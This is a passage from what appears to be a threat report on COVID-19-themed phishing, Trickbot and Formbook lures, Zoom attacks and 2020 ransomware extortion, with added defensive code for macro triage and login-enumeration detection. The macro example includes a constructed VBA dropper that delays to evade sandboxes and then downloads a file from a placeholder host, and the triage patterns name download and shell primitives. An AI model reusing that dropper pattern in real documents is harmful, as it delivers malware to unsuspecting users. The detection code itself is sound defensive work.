COVID-19 themed exploitations
The COVID-19 pandemic, which started at the very end of 2019, had a dramatic effect on our lives
around the world. But apart from the obvious dangers to human health and a huge economic impact,
the pandemic changed the digital world, the way we work, and the way we spend our free time online.
As travel ceased, most businesses and services had to switch to online operations. The ones who
already were online had to expand, others had to introduce completely new processes. Government,
medical, and service organizations had to adopt new means to meet everyday needs.
Business meetings migrated to telecommunication apps like Zoom, Webex, and Microsoft Teams,
which became the new standard. Office workers were sent home, often in a rush and without proper
support, resorting to their own equipment to perform their work.
Unfortunately, cybercriminals saw clear opportunities in these challenges and actively increased their
attacks, leaving human compassion and mercy behind.
As expected, people rushed online to get information about the new pandemic: how they
can protect themselves, what the latest news is, what assistance they can count on, and so on.
This interest resulted in a huge number of scams and other kinds of exploits. Cybercriminals
continue to use old tricks to exploit the COVID-19 theme in their cyberattacks, tricking victims
to enter their credentials or personal information on a phishing web page, or loading malicious
payloads into documents that pretend to contain essential information related to the pandemic.
There are other notable approaches as well; the following examples illustrate some of the
COVID-19-themed scams encountered.
Fake free testing
The latest version of Trickbot/Qakbot/Qbot malware was spread in numerous phishing emails
that offered free COVID-19 testing. Victims were asked to fill out an attached form, which turned out
to be a fake document embedded with a malicious script. To avoid revealing its payload in malware
sandboxes, the script wouldn’t start downloading its payload until after some time had passed.
The lure document uses a standard gimmick to trick users into clicking ‘Enable content’, which
allows the embedded malicious VBA script to execute.
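As an added example (not code from the report), a small triage heuristic that scores VBA macro source for the three ingredients of this lure appearing together: an auto-run entry point, a deliberate delay, and a download primitive. The VBA samples are constructed, the URL is a placeholder, and the indicator lists are an assumption rather than an exhaustive signature set.

```python
# Added example (not from the report): triage a VBA macro for the lure pattern
# described above: auto-run entry point + deliberate delay + download primitive.
import re

AUTO_EXEC = re.compile(r"\b(AutoOpen|Document_Open|Workbook_Open|Auto_Open)\b", re.I)
DELAY = re.compile(r"\b(Sleep|Application\.Wait)\b|\bDo\s+While\b.*\bNow\b", re.I)
DROPPER = re.compile(r"URLDownloadToFile|MSXML2\.XMLHTTP|WinHttp\.WinHttpRequest"
                     r"|WScript\.Shell|\bShell\b|powershell", re.I)

def triage_macro(vba):
    """Return the matched indicators per category plus a verdict."""
    hits = {
        "auto_exec": sorted({m.group(0) for m in AUTO_EXEC.finditer(vba)}),
        "delay": sorted({m.group(0) for m in DELAY.finditer(vba)}),
        "dropper": sorted({m.group(0) for m in DROPPER.finditer(vba)}),
    }
    present = sum(1 for v in hits.values() if v)
    # all three together is the sandbox-evading dropper shape; two deserve a look
    hits["verdict"] = {3: "suspicious", 2: "review"}.get(present, "benign")
    return hits

# constructed sample of what the report's "Enable content" lure looks like in VBA;
# the URL is a placeholder and nothing here is a working payload
LURE_VBA = """\
Private Declare PtrSafe Sub Sleep Lib "kernel32" (ByVal ms As Long)
Sub AutoOpen()
    Sleep 180000    ' outlast a short-lived sandbox run before fetching anything
    URLDownloadToFile 0, "http://placeholder.invalid/form", Environ("TEMP") & "\\f.bin", 0, 0
End Sub
"""

# constructed benign macro for contrast: document automation without delay or download
BENIGN_VBA = """\
Sub FormatTable()
    ActiveDocument.Tables(1).Style = "Grid Table 4"
End Sub
"""
```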
Fake financial support
In many cases, cyberattacks were local, tailored to how a particular country was hit by COVID-19. For
instance, the state of North Rhine-Westphalia (NRW) in Germany fell victim to a phishing
campaign. Attackers created rogue copies of the NRW Ministry of Economic Affairs’ website for
requesting COVID-19 financial aid. The fraudsters collected the personal data submitted by victims
and then submitted their own requests to the legitimate website using the victims’ information
but the criminals’ bank account. NRW officials reported that up to 4,000 fake requests had been
granted, resulting in up to $109 million being sent to the scammers.
Scams around remote education
Criminals also exploited the shift to remote education. A new pandemic-themed
phishing email delivered a Formbook Trojan embedded into a bogus grading application for
school teachers. Formbook is a type of infostealer malware capable of stealing login credentials
from internet browsers. It has been promoted on hacking forums since February 2016.
Interestingly, the attackers employed several anti-analysis and anti-detection techniques such as
sandbox detection and virtual machine detection, steganography, and XOR encryption to hide the
payload, thereby effectively evading Windows Defender.
The criminals behind Formbook campaigns have also been known to attack biomedical firms to
steal financial resources, sensitive personal data, and intellectual property.
Fake medical leave documents
The Trickbot campaign also exploited COVID-19 pandemic fears to spread a malicious
document entitled: “Family and Medical Leave of Act 22.04.doc”
The genuine Family and Medical Leave Act (FMLA) gives employees the right to medical
leave benefits. However, once the user activates the macro in these fraudulent documents, the
malicious script starts downloading additional malware onto the computer.
Chasing governments’ and private companies’ COVID-19 secrets
Certain valuable data related to the COVID-19 pandemic and suspected by some analysts
to have been kept secret by the Chinese government is attracting hackers from around
the world. For example, the Vietnamese state sponsored hacking group APT32 (also known
as the OceanLotus Group) reportedly attacked Chinese state organizations hoping to steal virus
control measures, medical research, and statistics revealing the number of infections that allegedly
have not been disclosed by China. Vietnam is a neighbor of China and its interest in part appears
to be motivated by its desire to control the spread of the pandemic around the region.
The Chinese company Huiying Medical, which is purported to have developed AI that can
diagnose COVID-19 based on computed tomography (CT) scanning images with 96% accuracy,
was allegedly hacked. According to cybersecurity firm Cyble, a hacker dubbed “THE0TIME”
put Huiying Medical data up for sale on the Dark Web that may contain user information,
source code, and reports on experiments at an asking price of four bitcoin
(approx. $30,000 at the time). Other APT groups attacked pharmaceutical companies
and vaccination laboratories in order to steal relevant data.
Remote workers under attack
The COVID-19 pandemic has significantly changed the threat landscape, highlighting
numerous security and privacy risks associated with remote work operations – including
remote access to internal company servers, virtual conferencing, and security training.
• Nearly half of all IT managers struggled to instruct and secure remote workers.
• 31% of global companies are attacked by cybercriminals at least once a day.
The most common attack types were phishing attempts, DDoS attacks, and videoconferencing attacks.
• 92% of global organizations had to adopt new technologies to complete the switch to remote
work. As a result, 72% of global organizations saw their IT costs increase during the pandemic.
• Successful attacks remain frequent, despite increased tech spending, because
organizations aren’t prioritizing defensive capabilities properly.
• 39% of all companies reported video conferencing attacks during the pandemic.
(Source: Acronis survey of 3,400 companies and remote workers from around the world in 2020)
Coronavirus increases Zoom attacks
The onset of the COVID-19 pandemic saw the Zoom virtual conferencing platform attracting
unwanted attention from cybercriminals. With the increased user base, more and more people
started analyzing the Zoom code for weaknesses and raising privacy concerns.
For example, Vice.com reported that two zero-day vulnerabilities – security holes that vendors
were not aware of and thus had no patches for – were available on the Dark Web market: one for Windows
and another for macOS. The Zoom Windows RCE (Remote Code Execution) exploit was for sale for $500,000.
Zoom also became the target of a phishing campaign aimed at stealing service credentials.
Phishing emails were delivered to more than 50,000 mailboxes, targeting Microsoft 365 users
with a fake email invitation to an upcoming Zoom call with the human resources department to
discuss a performance review (a topic designed to induce anxiety in the victim that might crowd
out their normal wariness of clicking on an email link). Such phishing attacks, in combination with
credential stuffing attacks where attackers check if the user shared the same password on multiple
services, led to over 500,000 Zoom user credentials floating around on underground forums.
The fact that many Zoom videoconferences didn’t have a password set also attracted cybercriminals.
People started trying out all possible meeting ID numbers until they found an ongoing meeting call.
They then joined the call and disturbed the participants by playing videos, loud music, or
other inappropriate materials.
These Zoom-bombing attacks led to many schools stopping their remote teaching programs.
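Both the credential stuffing and the meeting-ID guessing described above leave the same footprint in logs: one source failing against many distinct targets in a short time, where a real user fails a few times against one target. As an added example (not from the report), a sliding-window detector run over constructed join and login log lines; the log layout, field names, and thresholds are assumptions.

```python
# Added example (not from the report): flag sources that fail against many distinct
# targets in a short window. Log layout "<ts> <src_ip> <event> <target> <outcome>" is assumed.
from collections import Counter, defaultdict
from datetime import datetime, timedelta
SAMPLE_LOG = """\
2020-04-01T10:00:00 203.0.113.7 join 111222333 fail
2020-04-01T10:00:02 203.0.113.7 join 111222334 fail
2020-04-01T10:00:04 203.0.113.7 join 111222335 fail
2020-04-01T10:00:06 203.0.113.7 join 111222336 fail
2020-04-01T10:00:08 203.0.113.7 join 111222337 ok
2020-04-01T10:01:00 192.0.2.10 login alice fail
2020-04-01T10:01:40 192.0.2.10 login alice ok
2020-04-01T10:02:00 198.51.100.5 login alice fail
2020-04-01T10:02:01 198.51.100.5 login bob fail
2020-04-01T10:02:02 198.51.100.5 login carol fail
2020-04-01T10:02:03 198.51.100.5 login dave fail
2020-04-01T10:02:04 198.51.100.5 login erin ok
"""

def parse_log(text):
    """One dict per constructed log line; the timestamp becomes a datetime."""
    events = []
    for line in text.splitlines():
        ts, src, event, target, outcome = line.split()
        events.append({"ts": datetime.fromisoformat(ts), "src": src,
                       "event": event, "target": target, "outcome": outcome})
    return events

def detect_enumeration(events, event_type, min_distinct=4, window=timedelta(minutes=5)):
    """{source: peak count of distinct failed targets} for sources reaching min_distinct."""
    by_src = defaultdict(list)
    for e in events:
        if e["event"] == event_type and e["outcome"] == "fail":
            by_src[e["src"]].append(e)
    flagged = {}
    for src, evs in by_src.items():
        evs.sort(key=lambda e: e["ts"])
        live, start, peak = Counter(), 0, 0     # failed targets inside the sliding window
        for e in evs:
            live[e["target"]] += 1
            while e["ts"] - evs[start]["ts"] > window:   # expire events older than the window
                live[evs[start]["target"]] -= 1
                live += Counter()                          # in-place Counter add drops zero counts
                start += 1
            peak = max(peak, len(live))
        if peak >= min_distinct:
            flagged[src] = peak
    return flagged
```

A legitimate user retrying one account stays below the threshold, while a meeting-ID scanner and a stuffing run each cross it within seconds.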
Not only Zoom: Microsoft 365 users were attacked as well. Zoom was, of course, not the only
collaboration tool in the attackers’ crosshairs. Similar attacks hit
Microsoft Teams and Webex.
Lack of security for work-from-home staff
Now that many people have to work from home on their own computers, security threats are
rampant. Not only do those home machines often lack effective cyber protection, but many
users also don’t regularly apply the latest security patches for their operating system and popular
third-party software, leaving their machines vulnerable. Many of these private machines are
not managed by the IT department and therefore no company policies are applied to them.
Covering these vulnerabilities and patch management issues on the edge became a headache
for the admins and technicians who provide the IT support that helps small businesses survive during
In addition, home networks often host other unprotected devices belonging to children and
other family members. Furthermore, the broadband router is often
outdated, allowing attackers to hijack the router and potentially redirect specific traffic.
Ransomware is still the number one threat
Clearly, 2020 has been a year of ransomware with more attacks, higher losses, and new extortion
techniques being implemented by cybercriminals. Big cases become public practically every week.
According to a report published by Coalition, one of the largest providers of cyber insurance
services in North America, ransomware cases have accounted for 41% of cyber insurance claims
filed in the first half of 2020. “Ransomware doesn’t discriminate by industry. We’ve seen an
increase in ransom attacks across almost every industry we serve,” reports Coalition.
Big targets bring big ransoms
On July 18, Argentina’s largest telecom provider was hit by a ransomware attack — likely by the
Sodinokibi group — demanding a $7.5 million ransom. As is typical of many attackers who want
to force a quick decision from the victim, this demand was set to double if not paid within 48
hours. The ransomware allegedly infected more than 18,000 workstations, including terminals with
highly sensitive data.
Garmin, one of the world’s largest wearable device companies, confirmed that the major outage
that began on July 24 was due to a WastedLocker ransomware attack. This attack forced Garmin to
halt contact center operations, Garmin Connect, and even production lines in Taiwan. With an
estimated $4 billion in annual revenue, Garmin is certainly a high-value target. The requested ransom
amount is believed to be $10 million. Other recent WastedLocker attacks have demanded amounts
ranging from $500,000 to millions. The list of high-ransom victims goes on. In February, the
FBI published estimates for the profits of some ransomware groups. The list indicated that groups
like Ryuk made about $3 million per month in 2019. With paydays like that, it’s unlikely that the
threat will decrease anytime soon.
What’s more, modern ransomware families not only demand a ransom for decrypting data but
also for not disclosing stolen confidential data to the public, which increases their chances of
a payout even more.
Demanding ransom for non-disclosure
The REvil/Sodinokibi ransomware group announced on August 14 that they had compromised
the Kentucky-based Brown-Forman — the parent company of whiskey brands Jack Daniels, Old Forester,
The Glendronach, and various other wines and spirits. With a 2020 annual report showing gross
profits of more than $2 billion and a net income of $872 million, Brown-Forman is an undeniably
high-value target for ransomware operators. The REvil group claimed to have stolen 1TB of data,
including confidential employee information, financial data, internal communications, and
company agreements. Images posted on their leak site indicate that they possess data dating back at
least as far as 2009.
Canon, the multinational corporation specializing in optical and imaging products, fell victim to a
Maze ransomware attack that impacted their email system, Microsoft Teams, their U.S. website,
and other internal applications. The Maze ransomware operators stated that they stole more than
10TB of data from Canon, including private databases. Canon acknowledged the attack in an
internal message sent to employees.
CWT, one of the world’s largest travel and event management companies, was compromised by
the Ragnar Locker ransomware. The attackers allegedly stole 2TB of sensitive corporate data and
claim to have compromised more than 30,000 systems. While the attackers initially demanded
$10 million for the safe return of stolen data, CWT entered negotiations and eventually agreed to pay
a ransom of 414 bitcoin — equal to more than $4 million at the time of writing.
Conti, a new ransomware as a service (RaaS) and the successor of the notorious Ryuk variant,
released a data leak website as part of its extortion strategy to force victims into paying a ransom.
While Conti has been active for several months, it wasn’t until recently that the cybercriminals publicly
released a data leak site where they threaten to publish victims’ stolen data if the demanded ransom
is not paid. “Conti.News” currently lists 112 victims, including large and well-known companies.
In total, about 20 different ransomware groups have created dedicated pages for data leaks, hosted
on the Tor underground network. More than 700 companies have had their data published – 37% of
leaks came from Maze ransomware infections, followed by Conti with 15%, and Sodinokibi with 12%.
These data breaches can result in reputation loss, follow-up attacks, and various fines. Plus, the
leak of customer data might be punishable under privacy regulations such as GDPR or CCPA, and
paying the ransom could be an offense under the U.S. OFAC regulation.